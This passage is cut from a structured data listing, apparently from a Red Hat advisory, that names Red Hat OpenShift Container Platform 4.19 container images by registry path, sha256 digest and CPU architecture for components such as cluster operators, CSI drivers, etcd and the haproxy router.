"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
